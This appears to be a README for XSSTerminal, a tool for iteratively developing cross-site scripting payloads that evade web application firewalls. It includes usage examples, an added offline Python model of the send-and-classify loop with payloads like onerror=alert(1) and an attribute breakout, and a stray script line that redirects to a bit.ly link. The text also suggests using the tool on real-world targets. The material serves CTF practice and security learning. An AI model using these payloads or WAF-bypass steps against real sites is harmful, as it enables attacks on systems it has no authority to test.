It's a tool for developing advanced XSS payloads through repeated trial and error. Develop your own XSS payload interactively for CTFs, and maybe even for real-world targets. Typing each payload into the browser by hand and then hunting for that exact text in the page source to tell a sanitized reflection from a WAF block is boring. This is the upgrade you need :muscle:
pip install xssterminal
python3 setup.py install
usage: XSSTerminal [-h] [-u BASE_URL] [-p PAYLOAD] [-e ERROR_STRING | -s MATCH_STRING | -b BLIND_STRING] [-m {GET,POST}] [-o OUTPUT] [-r RESUME]
XSS Terminal
optional arguments:
-h, --help show this help message and exit
-u BASE_URL, --base-url BASE_URL
Base URL
-p PAYLOAD, --payload PAYLOAD
Starting payload
-e ERROR_STRING, --error-string ERROR_STRING
Error string
-s MATCH_STRING, --match-string MATCH_STRING
Match string
-b BLIND_STRING, --blind-string BLIND_STRING
Blind error string
-m {GET,POST}, --method {GET,POST}
HTTP method (default: GET)
-o OUTPUT, --output OUTPUT
Output file name
-r RESUME, --resume RESUME
Filename to resume XSST session
--banner Print banner and exit
<script>window.location="https://bit.ly/3n60FQ4";</script>
For advanced usage with explanation: XSSTerminal Usage/Explanation
./XSSTerminal.py -u https://baseurl.com/?v= -p "hello.com'><script>" -e 'Your IP has been blocked'
./XSSTerminal.py -u 'https://baseurl.com/?par1=y&par2=n&par3=s&vulnerable_parameter=' -p 'hello.com"><script>' -e 'Your IP has been blocked'
./XSSTerminal.py -u https://baseurl.com/waf.php -p 'par1=y&par2=n&par3=s&vulnerable_parameter=hello.com"><script>' -e 'Your IP has been blocked' --method POST
I was developing an XSS payload for the Clownflare WAF (CTF by Roni Carta/Lupin). I had some problems with not being able to test XSS properly, so I developed this tool. The arguments I used in the CTF were similar to this:
python3 XSSTerminal.py --base-url http://brutal.x55.is/?src= -p 'startingtext' -e 'Blocked'
At last, I came up with a payload that wasn't blocked. Though I didn't complete the CTF fully and failed, I learned a lot of awesome stuff.
It's not a tool for XSS detection but rather for exploitation, such as bypassing WAFs: you still need to know where your input is reflected, and the tool only speeds up the refine-and-resend loop.
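The loop the tool automates is small enough to show in full: append the candidate payload to the base URL, send it, then decide from the response whether the WAF blocked it (the `-e` error string appears), whether the payload came back verbatim (the `-s` match string, or the payload itself, appears), or whether it was sanitized. The block below is an added example written for this page, not XSSTerminal's own code. It runs offline against a constructed stand-in target (`fake_target`) that blocks anything containing `<script` and HTML-encodes only `<` before reflecting the value into an attribute; that target, the `?v=` parameter name, and the choice to URL-encode the payload with `quote_plus` are all assumptions for illustration. The `-b` blind mode is not modelled because the page does not define its semantics.

```python
"""
Offline model of the trial-and-error loop XSSTerminal automates:
send a candidate payload, then classify the response as blocked (-e),
reflected verbatim (-s), or sanitized. Added example; not the project's code.
"""
import re
from typing import Callable, List, Tuple
from urllib.parse import quote_plus, unquote_plus

Transport = Callable[[str], str]  # url -> response body

# Constructed stand-in for a real target so the example runs offline. It models
# a WAF that serves a block page for anything containing "<script" and a weak
# sanitizer that HTML-encodes only '<' before reflecting the parameter into an
# attribute value. Both behaviours are assumptions made for this example.
BLOCK_PAGE = "<h1>403 Forbidden</h1><p>Your IP has been blocked</p>"


def fake_target(url: str) -> str:
    raw = unquote_plus(url.split("?v=", 1)[1])
    if re.search(r"<script", raw, re.IGNORECASE):
        return BLOCK_PAGE
    reflected = raw.replace("<", "&lt;")  # quotes and '>' survive untouched
    return f'<html><body><input name="v" value="{reflected}"></body></html>'


def build_url(base_url: str, payload: str) -> str:
    """Mirror `-u BASE_URL` + `-p PAYLOAD`: the payload is appended to the base
    URL. URL-encoding it with quote_plus is an assumption of this example."""
    return base_url + quote_plus(payload)


def classify(body: str, payload: str, error_string: str = "",
             match_string: str = "") -> str:
    """Return 'blocked', 'reflected' or 'sanitized' for one response body.
    The error-string check runs first, exactly as a WAF block page would
    pre-empt any reflection."""
    if error_string and error_string in body:
        return "blocked"
    needle = match_string or payload
    if needle in body:
        return "reflected"
    return "sanitized"


def run_trials(base_url: str, payloads: List[str], transport: Transport,
               error_string: str = "", match_string: str = "") -> List[Tuple[str, str]]:
    """Try each payload in turn and record its verdict. This is the inner loop
    the interactive terminal drives one edit at a time."""
    results = []
    for p in payloads:
        body = transport(build_url(base_url, p))
        results.append((p, classify(body, p, error_string, match_string)))
    return results


# Three successive attempts, refined the way a practitioner would by hand.
ATTEMPTS = [
    'hello.com"><script>',                        # trips the WAF signature
    'hello.com"><img src=x onerror=alert(1)>',   # not blocked, but '<' is encoded
    '" autofocus onfocus=alert(1) x="',          # no '<' at all: lands intact
]


def demo() -> List[Tuple[str, str]]:
    return run_trials("https://baseurl.com/?v=", ATTEMPTS, fake_target,
                      error_string="Your IP has been blocked")


if __name__ == "__main__":
    for payload, verdict in demo():
        print(f"{verdict:9s}  {payload}")
```

Two caveats carry over to the real tool. The `-e` verdict is only as trustworthy as the error string being absent from every non-blocked response, so pick a string unique to the block page (an HTTP status code is often a better signal than page text). And "reflected" only means the bytes came back unencoded; whether they execute depends on the context they land in, which is why the third attempt here breaks out of an attribute with `"` instead of opening a new tag.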